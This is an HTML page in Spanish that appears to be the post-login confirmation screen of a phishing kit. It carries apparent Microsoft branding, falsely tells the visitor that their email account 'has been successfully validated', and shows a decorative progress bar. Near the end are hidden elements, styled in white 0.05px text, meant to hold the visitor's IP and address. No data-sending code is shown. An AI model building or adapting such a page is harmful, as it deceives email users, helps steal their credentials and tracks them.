<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="stylesheet" href="lapa/aparent.css">
    <title>Internet - Home</title>
  

    <style>
        .progress-container {
            width: 80%;
            margin: 50px auto;
            border: 2px solid #757575;
            border-radius: 5px;
            padding: 5px;
        }

        .progress-bar {
            width: 0;
            height: 30px;
            background-color: #00aa08;
            color: #fff;
            text-align: center;
            line-height: 30px;
            border-radius: 5px;
        }</style>


</head>
<body>
    <h2></h2>
    <center>
        <form method="post" action="#" onsubmit="return sender();">
        <img style="width: 30%;  " src="new/logoms_660-660x432.jpg" alt=""> <div class="clear"></div> 
        <h2>Felicidades, Tu cuenta de correo ha sido exitosamente validada</h2>
   
  <div class="progress-container">
    <div class="progress-bar" id="progress-bar">0%</div>
</div>


<script>
    function startProgressBar() {
        var progressBar = document.getElementById("progress-bar");
        var progress = 0;

        var interval = setInterval(function () {
            if (progress < 100) {
                progress++;
                progressBar.style.width = progress + "%";
                progressBar.textContent = progress + "%";
            } else {
                clearInterval(interval);
            }
        }, 30);
    }

    startProgressBar();
</script>
        <form class="login-form">
            <div class="form-group">
              
            
            </div>
            <div class="form-group">
               
            </div>
            <div class="form-group">
               
            </div>
    </form>
</body> <div style="color: rgb(255, 255, 255);font-size: 0.05px;">
<p id="gfg"></p>
<p id="ip"></p>
<p id="address"></p></div>
</html>
